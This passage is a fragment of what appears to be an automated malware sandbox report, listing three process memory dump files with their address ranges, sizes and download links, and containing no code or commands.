                                                                                                                  Filesize

                                                                                                                  180KB

                                                                                                                  Download

                                                                                                                • memory/3496-505-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  180KB

                                                                                                                  Download

                                                                                                                • memory/3868-503-0x0000000000400000-0x0000000000528000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  1.2MB

                                                                                                                  Download